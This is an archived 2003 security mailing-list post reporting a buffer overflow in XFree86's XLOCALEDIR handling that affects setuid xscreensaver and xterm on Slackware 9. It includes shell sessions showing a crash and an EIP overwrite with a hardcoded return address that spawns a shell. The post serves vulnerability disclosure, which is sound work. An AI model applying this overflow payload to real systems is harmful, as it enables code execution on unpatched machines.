lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030923092442.34591.qmail@web14608.mail.yahoo.com>
From: b0fnet at yahoo.com (b0f)
Subject: xfree86 latest version BUG not vuln.

Hello,

To make it clear I consider this to be a BUG in the
code
And not a vuln, But I still feel it should be fixed,
any
Shell from suid binaries is not good.

While playing around with xterm and xscreensaver which
are both 
setuid on Slack 9. I came across a bug in the
XLOCALEDIR env variable. 
There was a vuln back in January 2003 in the
XLOCALEDIR env variable,
An exploit for this can be viewed here…
 http://www.securiteam.com/exploits/5OP02209FO.html
This was fixed in 
Xfree86 4.2.1, slack 9 uses Xfree86 4.3.0 by default.
By using the same technique that this exploit uses but
by adding some
Extra args like ‘–font a’ or ‘–t 0’ this will still
cause these binaries to
Overflow and overwrite eip. Here is an example of
this.

toor@bob:/var/tmp/...$ ls -alF 
/usr/X11R6/bin/xscreensaver  
-rwsr-xr-x    1 root     bin        210544 Mar  7
20:59 /usr/X11R6/bin/xscreensaver*
toor@bob:/var/tmp/...$ export XLOCALEDIR=`perl -e
'print "A"x4500'`
toor@bob:/var/tmp/...$ /usr/X11R6/bin/xscreensaver -t
0
xscreensaver: warning: $DISPLAY is not set: defaulting
to ":0.0".
Segmentation fault
toor@bob:/var/tmp/...$ cat /etc/slackware-version
Slackware 9.0.0
toor@bob:/var/tmp/...$ uname -a
Linux bob 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686
unknown
toor@bob:/var/tmp/...$

Or to execute a shell..

b0f@b0f:/tmp$ ./es
EggShell loaded into enviroment
b0f@b0f:/tmp$ export XLOCALEDIR=`perl -e 'print
"A"x2052'``printf "\x64\xfa\xff\xbf"``perl -e 'print
"B"x34'``perl -e 'print "A"x1992'`
b0f@b0f:/tmp$ /usr/X11R6/bin/xscreensaver -t 0
xscreensaver: couldn't get password of "b0f"
xscreensaver: warning: $DISPLAY is not set: defaulting
to ":0.0".
sh-2.05a$ exit

xtrem seems to only overflow when effective and real
uid is the same.

The way the buffer was built is kind of weird it
overwrites eip after a buffer 
Of  2052 but it also needs more data after that for it
to overflow that’s why
I have another buffer of 2026 after the return
address. So you control eip
Round about the middle of the buffer.

It seems that where the overflow happens it is not
privileged there will be loads 
More apps that can be overflowed with XLOCALEDIR in
this way. I can’t see 
Any way possible to get higher privs from it.
Xfree86.org knows about this bug 
But have not yet fixed it due to the fact they don’t
see it as a security problem. I
Haven’t looked at the code to see what causes the
overflow. Thought I would post this info to see if
anyone can put it to any use? Would be great full of
any comments or suggestions.


Regards
b0f  (Alan M)
b0fnet@...oo.com
www.b0f.net


__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ